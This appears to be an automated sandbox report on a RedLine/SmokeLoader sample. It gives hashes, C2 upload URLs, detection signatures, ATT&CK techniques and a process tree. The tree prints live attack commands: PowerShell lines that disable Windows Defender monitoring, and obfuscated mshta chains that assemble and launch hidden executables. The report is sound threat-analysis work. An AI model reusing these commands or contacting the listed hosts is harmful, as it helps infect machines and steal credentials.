redline | 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f

Analysis

max time kernel
36s
max time network
165s
platform
windows7_x64
resource
win7-en-20211104
submitted
08-11-2021 10:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Size

3.5MB
MD5

a75539ada819b941531f116f3d50b13b
SHA1

942d264f3b0cc866c84114a06be4fa7aeb905b3c
SHA256

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0
SHA512

ee89498995cc1a9a91c754c391082f7e38fa22fee413033b6cb9318a0008baa7e8bfcf2a1c3aebc3fa1c0cbace33c27b8979953868b01dc296c9e01e0c8e3b49

Score

10^/10

redline smokeloader aspackv2 backdoor infostealer spyware stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2400	rundll32.exe	64

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral27/memory/2612-273-0x000000000041B23E-mapping.dmp	family_redline
behavioral27/memory/2604-270-0x000000000041B23E-mapping.dmp	family_redline
behavioral27/memory/2596-267-0x000000000041B242-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral27/files/0x000600000001226b-71.dat	aspack_v212_v242
behavioral27/files/0x000600000001226b-72.dat	aspack_v212_v242
behavioral27/files/0x0006000000012269-73.dat	aspack_v212_v242
behavioral27/files/0x0006000000012269-74.dat	aspack_v212_v242
behavioral27/files/0x0006000000012279-77.dat	aspack_v212_v242
behavioral27/files/0x0006000000012279-78.dat	aspack_v212_v242

Executes dropped EXE 13 IoCs

pid	Process
536	setup_installer.exe
1392	setup_install.exe
1468	Wed09ed6b36e57df5f.exe
996	Wed0944361c3621a67a6.exe
1900	Wed0900caa0501dc98f.exe
1832	Wed09c4c0c3d01.exe
1440	Wed09d761ab4704dd931.exe
1736	Wed0968d19e5ec37794.exe
1496	Wed090db89ca4c58.exe
816	Wed0983917533e.exe
1604	Wed09fbe3bf81.exe
1672	Wed09755e77ed017e8af.exe
1416	Wed091bab77a3bb62d.exe

Loads dropped DLL 51 IoCs

pid	Process
756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
536	setup_installer.exe
536	setup_installer.exe
536	setup_installer.exe
536	setup_installer.exe
536	setup_installer.exe
536	setup_installer.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1392	setup_install.exe
1840	cmd.exe
1468	Wed09ed6b36e57df5f.exe
1468	Wed09ed6b36e57df5f.exe
1732	cmd.exe
1760	cmd.exe
1900	Wed0900caa0501dc98f.exe
1900	Wed0900caa0501dc98f.exe
1420	cmd.exe
1832	Wed09c4c0c3d01.exe
1832	Wed09c4c0c3d01.exe
880	cmd.exe
552	cmd.exe
552	cmd.exe
2008	cmd.exe
1736	Wed0968d19e5ec37794.exe
1736	Wed0968d19e5ec37794.exe
1652	cmd.exe
1652	cmd.exe
1496	Wed090db89ca4c58.exe
1496	Wed090db89ca4c58.exe
1800	cmd.exe
1800	cmd.exe
816	Wed0983917533e.exe
816	Wed0983917533e.exe
1604	Wed09fbe3bf81.exe
1604	Wed09fbe3bf81.exe
1344	cmd.exe
1344	cmd.exe
1672	Wed09755e77ed017e8af.exe
1672	Wed09755e77ed017e8af.exe
980	cmd.exe
1416	Wed091bab77a3bb62d.exe
1416	Wed091bab77a3bb62d.exe
1368	WerFault.exe
1368	WerFault.exe
1368	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
28	ipinfo.io
29	ipinfo.io
40	ipinfo.io
43	api.db-ip.com
44	api.db-ip.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1368	1392	WerFault.exe	29

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed0983917533e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed0983917533e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed0983917533e.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2496	taskkill.exe
2272	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
816	Wed0983917533e.exe
816	Wed0983917533e.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 756 wrote to memory of 536	756	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	28
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 536 wrote to memory of 1392	536	setup_installer.exe	29
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 836	1392	setup_install.exe	32
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1392 wrote to memory of 1000	1392	setup_install.exe	31
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 1000 wrote to memory of 1200	1000	cmd.exe	33
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 836 wrote to memory of 1184	836	cmd.exe	35
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1840	1392	setup_install.exe	34
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1732	1392	setup_install.exe	36
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1392 wrote to memory of 1760	1392	setup_install.exe	37
PID 1840 wrote to memory of 1468	1840	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
"C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:756
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS812C1826\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:836
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:1184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1840
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09ed6b36e57df5f.exe
        
        Wed09ed6b36e57df5f.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
      4⤵
      Loads dropped DLL
      PID:1732
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0944361c3621a67a6.exe
        
        Wed0944361c3621a67a6.exe
        5⤵
        Executes dropped EXE
        
        PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
      4⤵
      Loads dropped DLL
      PID:1760
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0900caa0501dc98f.exe
        
        Wed0900caa0501dc98f.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
      4⤵
      Loads dropped DLL
      PID:2008
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe
        
        Wed090db89ca4c58.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1496
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
        6⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
        7⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
        
        ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
        8⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
        9⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
        10⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
        9⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
        10⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eChO "
        11⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
        11⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec /y ..\_enU.W
        11⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f -IM "Wed090db89ca4c58.exe"
        8⤵
        Kills process with taskkill
        
        PID:2496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
      4⤵
      Loads dropped DLL
      PID:1420
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09c4c0c3d01.exe
        
        Wed09c4c0c3d01.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1832
      - C:\Users\Admin\AppData\Roaming\1041789.exe
        
        "C:\Users\Admin\AppData\Roaming\1041789.exe"
        6⤵
        
        PID:2724
      - C:\Users\Admin\AppData\Roaming\2029126.exe
        
        "C:\Users\Admin\AppData\Roaming\2029126.exe"
        6⤵
        
        PID:2928
      - C:\Users\Admin\AppData\Roaming\7466937.exe
        
        "C:\Users\Admin\AppData\Roaming\7466937.exe"
        6⤵
        
        PID:1048
      - C:\Users\Admin\AppData\Roaming\7242542.exe
        
        "C:\Users\Admin\AppData\Roaming\7242542.exe"
        6⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:2076
      - C:\Users\Admin\AppData\Roaming\596517.exe
        
        "C:\Users\Admin\AppData\Roaming\596517.exe"
        6⤵
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
      4⤵
      Loads dropped DLL
      PID:1652
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0983917533e.exe
        
        Wed0983917533e.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
      4⤵
      Loads dropped DLL
      PID:880
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09d761ab4704dd931.exe
        
        Wed09d761ab4704dd931.exe
        5⤵
        Executes dropped EXE
        
        PID:1440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
      4⤵
      Loads dropped DLL
      PID:552
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exe
        
        Wed0968d19e5ec37794.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1736
      - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exe
        6⤵
        
        PID:2596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
      4⤵
      Loads dropped DLL
      PID:1800
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exe
        
        Wed09fbe3bf81.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1604
      - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exe
        6⤵
        
        PID:2604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
      4⤵
      Loads dropped DLL
      PID:1344
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exe
        
        Wed09755e77ed017e8af.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1672
      - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exe
        6⤵
        
        PID:2612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
      4⤵
      Loads dropped DLL
      PID:980
    - - C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed091bab77a3bb62d.exe
        
        Wed091bab77a3bb62d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1416
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 468
      4⤵
      Loads dropped DLL
      Program crash
      PID:1368

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2576
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:2772

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCripT: ClOSE( CREatEobjeCt ( "WsCRIPt.sheLl" ). RuN ( "cMD.eXe /Q/c TyPe ""C:\Users\Admin\AppData\Roaming\596517.exe"" >qYZE.eXe && sTaRt qYZE.eXE -ptCb5EYRlk5vz& IF """" == """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\596517.exe"" ) do taskkill /F -im ""%~nXm"" " , 0,tRUe ) )
1⤵
PID:2448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q/c TyPe "C:\Users\Admin\AppData\Roaming\596517.exe" >qYZE.eXe&& sTaRt qYZE.eXE -ptCb5EYRlk5vz&IF ""== "" for %m IN ("C:\Users\Admin\AppData\Roaming\596517.exe" ) do taskkill /F -im "%~nXm"
  2⤵
  PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F -im "596517.exe"
    3⤵
    - Kills process with taskkill
    PID:2272
- - C:\Users\Admin\AppData\Local\Temp\qYZE.eXe
    qYZE.eXE -ptCb5EYRlk5vz
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbSCripT: ClOSE( CREatEobjeCt ( "WsCRIPt.sheLl" ). RuN ( "cMD.eXe /Q/c TyPe ""C:\Users\Admin\AppData\Local\Temp\qYZE.eXe"" >qYZE.eXe && sTaRt qYZE.eXE -ptCb5EYRlk5vz& IF ""-ptCb5EYRlk5vz"" == """" for %m IN ( ""C:\Users\Admin\AppData\Local\Temp\qYZE.eXe"" ) do taskkill /F -im ""%~nXm"" " , 0,tRUe ) )
      4⤵
      PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q/c TyPe "C:\Users\Admin\AppData\Local\Temp\qYZE.eXe" >qYZE.eXe&& sTaRt qYZE.eXE -ptCb5EYRlk5vz&IF "-ptCb5EYRlk5vz"== "" for %m IN ("C:\Users\Admin\AppData\Local\Temp\qYZE.eXe" ) do taskkill /F -im "%~nXm"
        5⤵
        
        PID:2876
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbScRIPt:cLOSe ( CREAteoBJeCT( "wScripT.sHeLl" ). RuN ( "CMD /R EcHo | sET /P = ""MZ"" > xWMjA.R& cOpY /Y /b xWMJA.R + gVVBI.~ +RTXU4.XIZ + ycAolFG.S + 8YVAB.9U+ 6Hi7P2BI.2 BN8YnAg.P & StaRT control.exe .\BN8YNAg.P ", 0,TrUE ))
      4⤵
      PID:3036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R EcHo | sET /P = "MZ" > xWMjA.R& cOpY /Y /b xWMJA.R+ gVVBI.~ +RTXU4.XIZ + ycAolFG.S+ 8YVAB.9U+6Hi7P2BI.2 BN8YnAg.P &StaRT control.exe .\BN8YNAg.P
        5⤵
        
        PID:2884
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        6⤵
        
        PID:612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>xWMjA.R"
        6⤵
        
        PID:1952
      - C:\Windows\SysWOW64\control.exe
        
        control.exe .\BN8YNAg.P
        6⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\BN8YNAg.P
        7⤵
        
        PID:1288
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\BN8YNAg.P
        8⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\BN8YNAg.P
        9⤵
        
        PID:2484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/756-55-0x00000000753E1000-0x00000000753E3000-memory.dmp

Filesize
8KB

Download
memory/816-191-0x0000000000320000-0x0000000000330000-memory.dmp

Filesize
64KB

Download
memory/816-193-0x00000000001E0000-0x00000000001E9000-memory.dmp

Filesize
36KB

Download
memory/816-204-0x0000000000400000-0x0000000002DAA000-memory.dmp

Filesize
41.7MB

Download
memory/868-244-0x0000000000A30000-0x0000000000AA2000-memory.dmp

Filesize
456KB

Download
memory/868-241-0x00000000007B0000-0x00000000007FD000-memory.dmp

Filesize
308KB

Download
memory/1048-321-0x0000000004D90000-0x0000000004D91000-memory.dmp

Filesize
4KB

Download
memory/1184-212-0x0000000001F30000-0x0000000001F31000-memory.dmp

Filesize
4KB

Download
memory/1184-216-0x0000000001F31000-0x0000000001F32000-memory.dmp

Filesize
4KB

Download
memory/1184-224-0x0000000001F32000-0x0000000001F34000-memory.dmp

Filesize
8KB

Download
memory/1200-218-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1200-227-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1200-215-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1288-347-0x0000000003020000-0x00000000030D6000-memory.dmp

Filesize
728KB

Download
memory/1288-348-0x00000000031A0000-0x0000000003256000-memory.dmp

Filesize
728KB

Download
memory/1288-343-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1368-217-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/1376-219-0x0000000002A20000-0x0000000002A36000-memory.dmp

Filesize
88KB

Download
memory/1392-99-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1392-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1392-94-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1392-90-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1392-92-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1392-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1392-97-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1392-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1392-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1392-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1392-95-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
